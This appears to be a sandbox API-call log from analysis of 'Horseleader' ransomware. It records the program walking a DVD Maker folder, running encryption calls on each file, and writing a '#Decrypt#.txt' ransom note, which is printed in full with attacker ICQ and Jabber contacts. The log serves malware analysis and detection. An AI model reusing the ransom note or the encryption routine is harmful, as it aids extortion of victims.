[0251.670] lstrlenW (lpString=".testttjffg") returned 11 [0251.670] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.670] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.670] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png" (normalized: 
"c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.671] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7011242d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7011242d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x84, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="TitleButtonSubpicture.png", cAlternateFileName="")) returned 1 [0251.671] lstrcmpiW (lpString1="TitleButtonSubpicture.png", lpString2="Windows") returned -1 [0251.672] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 85 [0251.672] StrStrIW (lpFirst="TitleButtonSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.672] lstrcmpW (lpString1="TitleButtonSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.672] lstrcmpW (lpString1="TitleButtonSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.672] lstrlenW (lpString=".testttjffg") returned 11 [0251.672] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.672] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.672] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.672] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.672] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x703e5e14, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x703e5e14, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ded3ea1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1a9204, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_Page.wmv", cAlternateFileName="")) returned 1 [0251.672] lstrcmpiW (lpString1="Title_Page.wmv", lpString2="Windows") returned -1 [0251.673] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 74 [0251.673] StrStrIW (lpFirst="Title_Page.wmv", lpSrch=".horseleader") returned 0x0 [0251.673] lstrcmpW (lpString1="Title_Page.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.673] lstrcmpW (lpString1="Title_Page.wmv", lpString2="_uninstalling_.png") returned 1 [0251.673] lstrlenW (lpString=".testttjffg") returned 11 [0251.673] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv", lpSrch=".testttjffg") returned 0x0 [0251.673] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.673] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.673] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.673] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7047e388, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7047e388, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e050c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1d0304, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_Page_PAL.wmv", cAlternateFileName="")) returned 1 [0251.673] lstrcmpiW (lpString1="Title_Page_PAL.wmv", lpString2="Windows") returned -1 [0251.673] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 78 [0251.673] StrStrIW (lpFirst="Title_Page_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.673] lstrcmpW (lpString1="Title_Page_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.674] lstrcmpW (lpString1="Title_Page_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.674] lstrlenW (lpString=".testttjffg") returned 11 [0251.674] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.674] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.674] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.674] CreateFileW (lpFileName="\\\\?\\C:\\Program 
Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.674] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70588d13, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70588d13, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e1a789b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xad264, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="title_trans_notes.wmv", cAlternateFileName="")) returned 1 [0251.674] lstrcmpiW (lpString1="title_trans_notes.wmv", lpString2="Windows") returned -1 [0251.674] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 81 [0251.674] StrStrIW (lpFirst="title_trans_notes.wmv", lpSrch=".horseleader") returned 0x0 [0251.674] lstrcmpW (lpString1="title_trans_notes.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.674] lstrcmpW (lpString1="title_trans_notes.wmv", lpString2="_uninstalling_.png") returned 1 [0251.675] lstrlenW (lpString=".testttjffg") returned 11 [0251.675] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv", lpSrch=".testttjffg") returned 0x0 [0251.675] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.675] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.675] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.676] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x705fb12a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x705fb12a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e1f3b57, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb4f64, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_Trans_Notes_PAL.wmv", cAlternateFileName="")) returned 1 [0251.676] lstrcmpiW (lpString1="Title_Trans_Notes_PAL.wmv", lpString2="Windows") returned -1 [0251.676] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv") returned 85 [0251.676] StrStrIW (lpFirst="Title_Trans_Notes_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.676] lstrcmpW (lpString1="Title_Trans_Notes_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.676] lstrcmpW (lpString1="Title_Trans_Notes_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.676] lstrlenW (lpString=".testttjffg") returned 11 [0251.676] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.676] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.676] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.676] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.677] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7066d541, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7066d541, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e23fe13, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x999e4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="title_trans_scene.wmv", cAlternateFileName="")) returned 1 [0251.677] lstrcmpiW (lpString1="title_trans_scene.wmv", lpString2="Windows") returned -1 [0251.677] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv") returned 81 [0251.677] StrStrIW (lpFirst="title_trans_scene.wmv", lpSrch=".horseleader") returned 0x0 [0251.677] lstrcmpW (lpString1="title_trans_scene.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.677] lstrcmpW (lpString1="title_trans_scene.wmv", lpString2="_uninstalling_.png") returned 1 [0251.677] lstrlenW (lpString=".testttjffg") returned 11 [0251.677] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv", lpSrch=".testttjffg") returned 0x0 [0251.677] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.677] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.677] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.678] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70705ab5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70705ab5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa16e4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_Trans_Scene_PAL.wmv", cAlternateFileName="")) returned 1 [0251.678] lstrcmpiW (lpString1="Title_Trans_Scene_PAL.wmv", lpString2="Windows") returned -1 [0251.678] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv") returned 85 [0251.678] StrStrIW (lpFirst="Title_Trans_Scene_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.678] lstrcmpW (lpString1="Title_Trans_Scene_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.678] lstrcmpW (lpString1="Title_Trans_Scene_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.678] lstrlenW (lpString=".testttjffg") returned 11 [0251.678] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.678] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.678] CryptEncrypt (in: 
hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.678] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.678] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70079eb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70079eb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1a3c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="userContent_16x9_imagemask.png", cAlternateFileName="")) returned 1 [0251.678] lstrcmpiW (lpString1="userContent_16x9_imagemask.png", lpString2="Windows") returned -1 [0251.679] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png") returned 90 [0251.679] StrStrIW (lpFirst="userContent_16x9_imagemask.png", lpSrch=".horseleader") returned 0x0 [0251.679] lstrcmpW (lpString1="userContent_16x9_imagemask.png", lpString2="#Decrypt#.txt") returned 1 [0251.679] lstrcmpW (lpString1="userContent_16x9_imagemask.png", lpString2="_uninstalling_.png") returned 1 [0251.679] lstrlenW (lpString=".testttjffg") returned 11 [0251.679] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png", lpSrch=".testttjffg") returned 0x0 [0251.679] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.679] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.679] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\usercontent_16x9_imagemask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.679] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700c6173, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700c6173, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2ee8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="whitemenu.png", cAlternateFileName="")) returned 1 [0251.679] lstrcmpiW (lpString1="whitemenu.png", lpString2="Windows") returned -1 [0251.679] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png") returned 73 [0251.679] StrStrIW (lpFirst="whitemenu.png", lpSrch=".horseleader") returned 0x0 [0251.680] lstrcmpW (lpString1="whitemenu.png", lpString2="#Decrypt#.txt") returned 1 [0251.680] lstrcmpW (lpString1="whitemenu.png", lpString2="_uninstalling_.png") returned 1 [0251.680] lstrlenW (lpString=".testttjffg") returned 11 [0251.680] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png", lpSrch=".testttjffg") returned 0x0 [0251.680] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.680] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.680] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\whitemenu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.680] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700c6173, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700c6173, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2ee8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="whitemenu.png", cAlternateFileName="")) returned 0 [0251.680] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.681] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\#Decrypt#.txt") returned 73 [0251.681] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.683] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - 
horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.683] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.684] lstrlenA (lpString="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") returned 1368 [0251.684] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.685] CloseHandle (hObject=0x158) returned 1 [0251.685] GetProcessHeap () returned 0x780000 [0251.685] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.685] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa15a10e8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa198102e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Pets", cAlternateFileName="")) returned 1 [0251.685] lstrcmpiW (lpString1="Pets", lpString2="Windows") returned -1 [0251.685] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 52 [0251.685] lstrcmpW (lpString1="Pets", lpString2=".") returned 1 [0251.685] lstrcmpW (lpString1="Pets", lpString2="..") returned 1 [0251.685] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.685] GetProcessHeap () returned 0x780000 [0251.685] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 
0x7dc820 [0251.685] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\*") returned 54 [0251.685] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa15a10e8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa198102e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.688] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.688] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\.") returned 54 [0251.688] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.688] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa15a10e8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa198102e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.688] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.688] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, 